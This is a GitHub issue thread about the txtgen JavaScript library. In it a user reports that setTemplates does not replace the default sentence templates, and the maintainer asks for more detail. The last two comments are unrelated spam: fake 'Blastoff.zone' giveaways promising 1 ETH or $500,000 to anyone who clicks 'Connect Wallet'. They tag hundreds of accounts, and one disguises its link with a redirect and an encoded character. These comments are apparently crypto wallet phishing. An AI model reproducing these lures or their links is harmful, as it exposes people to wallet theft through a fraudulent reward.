### ISSUE TITLE
Setting temlates does not override them

### ISSUE THREAD

**Issue by baltuonis** [ndaidong/txtgen#49]
I try to override all the templates but txtgen does not pick it up

Code

```
txtgen.setAdjectives(adjectives)
  txtgen.setNouns(nouns)
  txtgen.setTemplates(templates)
  console.log("\n\n" + txtgen.getTemplates())

  const sentence = txtgen.paragraph(2);
  return sentence;
```

Output
```

a writing {{a_noun}} is {{a_noun}} coverages for {{a_noun}}
Some assert that a writing a DESC is a REF coverages for a DESC. What we don't know for sure is whether or not a writing a REF is a LOL coverages for a DESC.
```

**Comment by ndaidong** [comment]
@baltuonis thank you, I will check this issue asap.

**Comment by ndaidong** [comment]
@baltuonis hello, could you show me your more detail of code? I could not reproduce the same issue in my test.

**Comment by baltuonis** [comment]
I think it's related with it automatically putting a random phrase in the beginning.
I had copy your code into my project and remove it manually

**Comment by carlosfgti** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
Mikimouse222, @Soulthief89, @jrmanes, @hu8813, @suchat932, @makjom71, @Willisplayedcloud, @ishkash69, @Mykel2020, @moteesh-reddy, @haskell-monad, @aSKz1, @skotancilar, @vasilbo1, @0xdiegobreth, @pz-portal, @Segundonflexy, @wandou220, @doridori-samsam, @ASicPerson, @abhnva, @qq1972474341, @Pana, @Silihuang, @lizhiyu-me, @codeninja819, @Rahul-Prasad-07, @razuanrahman, @kzlelma4299, @Majidbaba, @yuchen, @hrithikt, @HoangNguyen17193, @izga, @AliakbarETH, @justBanks, @thomasthachil, @pdhairya48, @Montiel06, @quentinhb, @gn-z1109, @0x50Fc, @Khoailangthang, @0xRory, @Lnek, @WeinLongLin, @ElPaparazzi69, @jamiemoller, @V00D00-child, @gantunesryaya555666, @Becia92nh, @wackyapps, @josephivanav, @AsaBogyo, @strongfist, @Topchik-web, @ramyavada, @IvanUmanzor, @hu53yin, @opatricpires, @cubical8569, @rozaal786, @Renoeth, @thanhvipbs, @NerdyDave2017, @ritik944, @9834ji, @Vid201, @Apoll95, @jamesahnking, @Miguel22247, @priyamla, @lion10, @PaulGG-Code, @hx2ryu, @fenglan2010, @jsfour, @silencewing, @Jackisagoodboy, @Hilton900, @novowind, @Remzila, @techonerd, @antaintan, @sl131420, @L540427, @MSA-13, @BinGitHubPlus, @Fullbuster12, @Mahdidavash, @Kingsilver600, @Mojtabaa09, @coreyjanssen, @LazaroAssis, @LuisJoseLopezD, @skgbafa, @Notes702, @KleenexN8, @useCallbacktosunkaya, @priest671, @v1mirza, @2659170494, @mehmetbybz, @Coool, @Abdullahp1, @callmecoffee3, @Safvan-tsy, @FathaDavis, @mr-roboto11, @jonathan102-git, @banerRana, @timothyshen, @Endorfinalna, @zhaoyupenggit, @mrinnnmoy, @pburkepro, @Arsi44, @Lucvbs, @viksala58, @nerr, @yoshis2, @Pranavtej, @iamowenrogers, @bcschaitin, @qidai87, @RyuuXin190, @VientianeArtery, @JabezRoberts, @idavidgeo, @Waxdau, @LoShinYen, @Carlostulotero, @cipaterson, @verdinjoshua1982, @a123465, @Jhr7771, @95decode, @boluwatife234, @aaron0099, @Purpleprince666, @Bilal-Ahmed-Developer, @Shojaie-Git, @thesecondbull, @aloshvalosh, @uzogoduyah, @zoexx, @Greg0087, @alonecandiesfrnnnzy, @jungsungjae, @Nesh1988, @SMN141319, @Ashuk777, @luxinwu, @indranildeveloper, @aboalaa2, @thebrazilbilly, @Frasprite, @CampominosiMarco, @xXDevy, @gunit666, @BaxshiTsatryan, @jircs, @abbassabb, @ZtengClub, @0xteleon, @morephire, @iliiliii, @joaotav, @Asofe1997, @omid-web, @MohamedTaoufik, @Tomwslape5638, @c0np4nn4, @dogefoodcoin, @affiliateweapons, @Beardography, @Baoge678, @Zoya1110, @vahdani, @Ranaak7, @sharmanshiri, @si14-dot-space, @Slook26, @woo-lukas, @mashharuki, @vivekpal1, @swimricky, @bart86lion, @Shinichi88888, @BHAIsandeep, @konojunya, @1231li, @jfirest1, @Yhamskie30, @greengeko, @Pekipekka644, @uli-gitsitindranildeveloper, @kelevis, @cardkazuma, @Mescalina80, @nxuanmy03, @Mathgobbo, @Mepond, @CoryHenson17, @Wsyww, @pedrox-hs, @LATHU629, @DarlingUUi, @nhthanh073, @paulsimroth, @learn2grid, @CodingWithEnjoy, @sheezy777, @takg, @code-wizard21, @haojianyun, @mammon69bot, @Hakkonen, @StricklandF, @ludovino91, @PriyathamVarma, @Inxubis13, @BipRaider, @h888999, @fairhopeweb, @holder16, @AODIA, @cryptimex, @niosvargas, @kisenyang, @Pekipekka644, @cenobyte321, @muhammad-mobeen, @nkliu1772, @kazusdc, @Asusani, @peterred123, @uhupljj, @aaservice, @vhenwan, @alinedubardfmf84, @VASHvic, @Lenka-1984, @hassanms, @DamonXiong, @ElegantCriptojongan69, @CY0xZ, @mariadriana-deemaze, @hkpatch, @Abdurrahman-Alizada, @lav4u12000, @aharutyunyan80, @zxf000000, @Asusani, @lurdray, @MatthewKaus, @555jzj, @certainShawn, @littlefreebird, @Brilara, @Ehsan129, @stephdgenius, @onurozen, @DanteTsukuyomi, @Sjcbdudnxbx, @J12171972, @matxhe, @nasiaralsibani, @jkboss, @samkenxstream, @Lm131419, @chillx2land, @is-paranoia, @YYazi, @JeffTheGinger, @omid-web, @mikesposito, @ayifttt, @KuyaW, @dreamap24, @Delegat43, @Finternetcafe, @a-khushal, @delvalwebdev, @Emraja123, @LicaonPictus, @tomjrtsmith, @danielsp45, @Omni-Engineering, @ck112358, @TheWalKer-TW, @KristyKristyyy, @jachchuang007, @34589975437899, @awos08478xhcdpg, @chengkaigithub, @CieriCrypto, @Neustradamus, @tibi77, @OneNiNE87, @MohamedTaoufik, @ssuchichen, @wecreateproject, @Batxent, @DiscoDavies26, @IsaacOrzDev, @a32077, @thisisyou33-publishing-networks, @blowcowbeer, @FlepNL, @huynh922, @mjmk3, @codenyte, @jmsdesignlab, @opraone, @Beardography, @The11sun, @LuSicong22, @kaifirschau, @CulturalMonk, @johnnyleejy, @jeffy081518, @dclsamples, @Ashuk777, @NguyenHiu, @tony6day, @xicoder666, @bobby-bates, @mastio-hg, @VyaWave, @NeziheSozen, @13294667517, @rodriguezye, @Metissean85, @ParsaaRezaeii, @kohazidaniel, @FLLTECH, @jameschern, @Ucetosm, @anashdieb, @EthSecurity1, @BabarkhanETH, @JohnStroeber, @Magnus6803eaksor, @danBamikiya, @d1466, @ucetpet, @justjinn, @aharutyunyan80, @Srisuryaprasanth, @realbonjoy, @jmark20, @skytsui, @PriyathamVarma, @Mizanur1988, @ederfurtado, @effektsvk, @SmisoMazibuko, @jonata-83, @chikitai, @tron123321, @nszbf, @IndieMinimalist, @Kipnasty, @florolf1, @jemiks, @Tdout, @xjohnwu, @wellbenicio, @EK2EvilKongs, @alfwilbrsvip2935, @web3barki, @baiming121, @redbankdev, @Orrmj, @DreamEye69, @mauri146K, @ahaouem, @0xizee, @btchold, @zack06124, @Eltigre4321, @Tonibrown20, @Ghepes, @luutuandat14, @nihar-hegde, @Aleksandr240484, @r4m15, @wyzswr1, @huachangqing333, @ilken, @Beeza1989, @arianXdev

**Comment by vishalyadav98** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://aq-3d.wikidot.com/%0a/app.blastofflzone.com/referral/)

# Blastoff.zone: Claim Your Share of 1 Million Tokens and $500,000!

Congratulations! You've just unlocked an exclusive opportunity to claim your share of 1 million tokens and a staggering $500,000 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://aq-3d.wikidot.com/%0a/app.blastofflzone.com/referral/) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500,000 bonus.
3. Use the "Claim Now" option to secure your tokens and cash in on the rewards.

This offer is limited and won't be available for long, so act now to maximize your gains!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 1 million tokens already claimed, seize this incredible opportunity before it's too late!
Hannibal83, @vipbooy2019, @lx-xi, @K1noroozi, @Johnson1s, @Robertoataop, @anhhung1303, @MoodyReaper, @MelamoryGrin, @abhishek1591, @valjok, @PopeNobody, @kamal-ganwani, @Jhed05, @GwenDevOps, @Gemk83, @SiboldSiborg, @VinhomesOceanPark2, @EXPESwap, @cubical8569, @prisiazhniuk, @dossihounkpenoudji10, @griegos211, @qct, @GabbaSauRuzZ, @brytemorio, @matrix-compute, @Herisofyan, @darthRevan0824, @Reddit321, @kootsZhin, @daniel9059, @Ali3n3, @Mimiranky, @bilalsalah2, @Tgirlginger, @Christuneking, @seuzht, @ffcodiguin, @mostafalarki1368, @cryptoadu, @lanxingmo, @ndaidong, @Kinqkc, @Atillaus, @phamphuvinh, @nima369, @Syahrilsaad, @valentininua, @saadihaidariimmense055, @PokNasan, @YD811, @thealaoifeoluwa, @DaniHBV, @989335935805, @ozgurhasar, @Gyunay82, @danielmbirochi, @Evge-s, @Siya8080, @jsonliu, @Aislam123, @ShawkyHanna, @jarihte, @Gagagirigori, @ZDVdL, @tvews8z, @diegogallovich, @Dropxtor, @ArkadiuszCwiek, @AmirArsalanGhaffari, @shodges1877, @Sandman1225737, @Javier22049, @Jorc, @oddi83, @Saint111188, @ContackTR, @mit-net-ai, @tarequemridhat10, @rondales, @Kosing2022, @JayTee1994, @Gandra011, @nashorstyle, @Mhjr84, @Shneezin1, @luoquanquan, @anavarani, @MorphyHu, @Clayface1, @Brittanyhorto, @DeShyton, @TokensDL, @BristoFK, @Anolfazlsayari, @cB1980623, @badamit, @groot-ww-androidStarBalance, @DELJUJAZI, @Roccafella91, @rednam-ntn, @K-NRS, @Cj1377, @sajjadgol, @amandaweston1306, @PerezChris99, @james227, @jameson110, @Halilyildizhan, @sacredstarfamily, @Domik94, @Anonymous-User-c4676, @tae272, @oemchumdaven, @composite57, @swimricky, @ARYA17MUHAMMAD28, @newgate01, @wlad, @Tariq603, @adriancontrerasdsm, @kambiz757, @Stuntdouble1, @renaissancelab, @Oaksuprem, @TankTim68, @anthonyohale6, @00923007163943, @halagu1l, @vip67russs, @lxchao1024, @MohamedAbulgasem, @Hossein821, @Github33xx, @AbulKhayer2244, @Skynetholst, @cunyiu, @zhwei820, @OxygenUz, @lbadge, @RichTwicz, @Nellyjay22, @TrongChuongDao, @Asdfghfszzx, @MellKam, @N3v1, @AgulIsnajiRe4044, @abdulhadi9-savg, @RBLabJohnathan, @treyhuffine, @Saenmosii110, @DevaiHoldings, @ABITSHADOWDeFiTOKEN, @frankadonis100, @IMOLE10, @Behruzh, @0xM3R, @sergey041, @Markiv84, @fendermany, @Solcambel, @lasiya111, @dNESHGARG, @Bames94, @E-sam123, @OBGunderground, @izlan90, @Nephy12, @vorobeyme, @igefined, @aaa3531, @Mohammed-yimam, @Rtthyth, @Najibullah5, @0642330413, @NadiaNadir, @Doganozturk57, @18Anderson18, @tinhb92, @Regard4, @PsychoTek, @gekiatuyarou, @StickyRS, @Saeedhbh, @Thanhotis, @Azzaking, @multi-coder, @emin93, @anasaboayham, @DimaJah, @MocMoc20232024, @CoDoDas, @janellelynette, @awalo666, @Tempted1984, @Shetima044soi-20, @MIHARISOA98, @yasmina134, @DUROGKON777, @farwqmdhsnly, @antonymelo7, @Loki-Tu, @MattiZA, @ars115t, @Worilez, @Fardinporjamal, @JOSEk25, @HAMIDREZA1359, @damnsonne, @stacymccammon2, @Abdulwahab1409, @Dwayneo1, @Sunny68778, @cumsoft, @levandos19, @Ye550686, @gatleas17, @tuvudu, @Kazy0004, @Dopeso, @ravilushqa, @Dgftdr, @UseeNadabo, @demining, @behnam2543, @Ashir2022, @floydspace, @treyhuffine, @Amirahmdpwr, @Erkansukgen, @taurus228, @KE1354, @rabinovich101, @YayaBN, @Biniu28, @killvxk, @Bryanlopez1259, @Fahim080, @Terrapind, @Harsha6420, @Eli1174j, @Rocioamor1, @Jrgary1111, @Patrycja1105, @Akejradavorobeyme, @Metin6201, @sharon897, @mumenma, @wezichipeta, @Anis-Barghouthi, @arenlatricia22, @Roobinhan, @Geek-Zeroo, @Mehdifall, @jayb1027, @Majesty321, @rcolomina, @heinzdotcom, @miffyyyy, @ROfiql12345, @yuekinny, @bziwei, @dNESHGARG, @luncnymph, @mengxiaozhi, @Emadami, @Mofidzol, @cutehackers, @rdsimmons2301, @abnoticz, @esmailiehsan8, @ujerry582, @ZemlyanikaM, @chefgsaroar, @YayaBN, @elementallyXD, @Daplug01, @Victorabalogu, @Riz241980, @hannibal-kill, @Lightto, @Julybui199x, @Olue411, @matthewbill, @Vikar666, @tion126, @FUADMOHAMED022, @Ramly7878, @My178-oss, @michelle061121, @nspassov, @ailalexail, @developerasun, @Bibi1985Alshrs, @theresecao00, @Gabe4rbles, @akinpelu2003, @Grzegorz8505, @Nihat217716, @lkhg, @banabina, @Kedzia00, @ASELADULANJANA, @vivandiu, @eteryko, @umerbutt007, @Karatla, @Edavolkan89, @Noosom, @ablain623, @badasserry, @kevinjlope, @23sean, @TheMasterFOu, @anashdieb, @MedCareCoin, @storytellerF, @leonov31, @RIGHTHOOD, @Jrgary1111, @bilal614, @MrHero1983, @Harsha6420, @KevenNock, @Vitacoin78, @Peyman20j, @kelvintys38, @Przezrz, @maaznizam290, @Davut65, @ABCSA120, @Mniar22, @junlinchris1, @ManikandanJP, @ahmedelghandour21793, @Pschal, @Rallyfart, @Thankgodreal1, @Arslan99-k, @nolantrent, @Mikeme101, @Delegat43, @aravind-govindhasamyRealblack22, @gcjordi, @singpay, @vatrofi, @matusz56, @sealenjy, @parya12345678, @ReClicker, @GitNami90, @liushangkun, @suchat932, @Bendeares, @AbleZim, @Milimn, @YashekaLangston, @bybogdan, @JoKacar, @maxoooaa, @Comosaycomosah, @multi-coder, @ashfaq689, @ronaldoguedess, @KnightRiderC137, @Mrrjay1, @Kk150518, @Tonic28, @robsoncruzs, @Velmurganvelmurgan, @Sajadon, @jjjjenya, @nikoskarakostas, @Serenitychic, @GloWE3, @OpexToken, @Apichat10, @Karimsultan, @Attiekeratie007, @in74mz, @bobi772, @Josegutierrez69, @barbiek1st, @hamedakbar, @rhelio, @Noizzik6, @FD-Kevn, @zoran666540, @two-bucks, @chenlie449, @SergioFinix, @EDGESP03
